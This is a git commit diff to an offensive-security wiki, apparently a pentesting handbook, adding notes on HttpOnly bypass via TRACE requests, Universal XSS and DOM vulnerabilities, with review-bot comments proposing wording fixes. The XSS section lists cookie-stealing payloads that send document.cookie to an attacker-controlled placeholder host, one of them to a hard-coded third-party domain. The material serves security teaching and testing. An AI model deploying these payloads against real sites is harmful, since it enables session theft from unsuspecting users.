GitBook: [master] 472 pages modified

This commit is contained in:
CPol 2021-05-27 11:59:23 +00:00 committed by gitbook-bot
parent 5f83c0bdad
commit e765a981c7
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 30 additions and 1 deletions

View File

@ -119,6 +119,12 @@ A cookie with _**SameSite**_ attribute will **mitigate CSRF attacks** where a lo
This avoids the **client** to access the cookie \(Via **Javascript** for example: `document.cookie`\)
#### **Bypasses**
* This could be Bypassed with **TRACE** **HTTP** requests as the response from the server \(if this HTTP method is available\) will reflect the cookies sent. This technique is called **Cross-Site Tracking**.
* This technique is avoided by **modern browsers by not permitting sending a TRACE** request from JS. However, some bypassed to this have been found in specific software like sending `\r\nTRACE` instead of `TRACE` to IE6.0 SP2.
* Another way is the exploitation of zero/day vulnerabilities of the browsers.
### Secure
The request will **only** send the cookie in an HTTP request only if the request is transmitted over a secure channel \(typically **HTTPS**\).
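Review bot: the technique in the first bullet is conventionally called Cross-Site Tracing (XST), not "Cross-Site Tracking"; readers searching for the standard name will not find this section otherwise. The same hunk has several wording slips worth fixing in one pass: "This avoids the client to access the cookie" should read "This prevents the client from accessing the cookie", "some bypassed to this have been found" should be "some bypasses of this have been found", and "zero/day" should be "zero-day". Since the bullets only list bypasses, a closing line on the server-side mitigation (disabling the TRACE method on the web server, which removes the XST vector entirely) would give the section its defensive counterpart.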

View File

@ -67,6 +67,17 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
{% page-ref page="dom-xss.md" %}
### **Universal XSS**
These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.
Some **examples**:
{% page-ref page="server-side-xss-dynamic-pdf.md" %}
{% page-ref page="../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps.md" %}
## WAF bypass encoding image
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
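Review bot: the "Universal XSS" paragraph needs grammar fixes before it reads cleanly: "These kind of XSS" should be "This kind of XSS", "They not depend just on" should be "They do not depend just on", and "can even be abuse to obtain" should be "can even be abused to obtain". In the DOM vulnerabilities line, drop the space before the period after `location.href` and the comma in "An attacker, could abuse". The "WAF bypass encoding image" section is a bare screenshot whose alt text is only an attribution URL; a sentence stating what the image demonstrates would make the section usable for readers who cannot load the image and would give the alt text real content.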
@ -484,7 +495,10 @@ Remember to look into what is already loaded! jQuery is an easy example, but any
## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**.**
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
{% page-ref page="dom-xss.md" %}
There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.
Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
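Review bot: the two "Due to the extension of the explanation of ... it was moved to this page" lines are duplicates differing only in the trailing period versus colon; keep the colon version that introduces the page-ref and drop the other. The paragraph "There is JS code that is using unsafely data controlled by an attacker ..." also repeats, nearly word for word, the DOM vulnerabilities paragraph added earlier in this same file, so one of the two sections should simply link to the other. Minor wording: "Due to the extension of the explanation" reads more naturally as "Because the explanation is long", and "how are they provoked" should be "how they are provoked".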
@ -592,6 +606,7 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
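Review bot: the placeholder for the collecting host is inconsistent across these payloads (`<YOUR_SERVER_IP>` in some lines, `<IP>` in others); pick one so readers do not mistake the two for different parameters. It would also help to state once above the list that every variant here reads `document.cookie`, so all of them are defeated by the HttpOnly flag, rather than leaving that only to the hint further down the page.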
@ -609,6 +624,10 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
{% hint style="info" %}
You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough.
{% endhint %}
### Port Scanner \(fetch\)
```javascript
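Review bot: `navigator.sendBeacon('https://ssrftest.com/x/AAAAA', ...)` points at a hard-coded third-party domain while every other payload in this section uses a placeholder for the reader's own host; anyone copying it during a test would send cookie data to whoever controls that domain, so replace it with the same `<YOUR_SERVER_IP>` placeholder. In the hint, "HTTPOnly" should be "HttpOnly" to match the cookie attribute's usual spelling, and "if you are lucky enough" is informal filler that can be dropped without losing anything.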

View File

@ -12,6 +12,10 @@
Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session.
{% hint style="info" %}
**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)\*\*\*\*
{% endhint %}
**Common sources:**
```javascript
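Review bot: the hint line ends with `\*\*\*\*`, four escaped asterisks left over from a bold marker wrapped around the link; remove them, since they render as literal asterisks after the URL. Also "a more updated list" should be "a more up-to-date list".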